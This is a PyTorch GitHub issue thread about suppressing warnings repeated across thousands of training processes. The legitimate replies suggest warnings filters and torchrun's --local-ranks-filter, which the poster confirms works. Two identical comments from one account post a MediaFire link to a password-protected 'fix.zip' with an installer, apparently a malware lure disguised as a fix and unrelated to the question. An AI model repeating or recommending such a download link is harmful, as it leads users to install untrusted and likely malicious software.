### ISSUE TITLE
Too many warnging

### ISSUE THREAD

**Issue by huihoaan** [pytorch/pytorch#134458]
### 🚀 The feature, motivation and pitch

As we know, many warning in torch will printed in every process, such as:
https://github.com/pytorch/pytorch/blob/1ff226d88c70e66434ed9ce50deb5ae09e7e766c/torch/csrc/tensor/python_tensor.cpp#L78-L81.
It's OK when I use a few devices. But with the rise of LLM, we use a lot of cards for training, like tens of thousands of cards.I redirected the printed information to one file for better find the problem。 At this time, a large number of repeated warnings filled this file, which brought a trobule to my work.
So I wondered if there was a switch that would turn off the warning or print it just once throughout the training network. 
Today, many models are started by torchrun or deepspeed, they will set `RANK` for every process. So printing only when the environment variable RANK is 0 maybe a simple and efficient way to do this?

cc @XilunWu @H-Huang @awgu @kwen2501 @wanchaol @fegin @fduwjj @wz337 @wconstab @d4l3k @c-p-i-o @malfet

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ashok-arora** [comment]
Does something like this work?
```python
import warnings
import torch

warnings.filterwarnings("ignore", category=torch.jit.TracerWarning)
```

**Comment by tianyu-l** [comment]
If you use `torchrun` you can filter log on specific ranks by using `--local-ranks-filter`, see https://github.com/pytorch/pytorch/blob/main/torch/distributed/run.py#L576

**Comment by huihoaan** [comment]
> You can set global logging level, see https://docs.python.org/3/library/logging.html#logging-levels.
> 
> If you use `torchrun` you can filter log on specific ranks by using `--local-ranks-filter`, see https://github.com/pytorch/pytorch/blob/main/torch/distributed/run.py#L576

Thanks for your advice. I test `--local-ranks-filter` in v2.3.0, it worked.
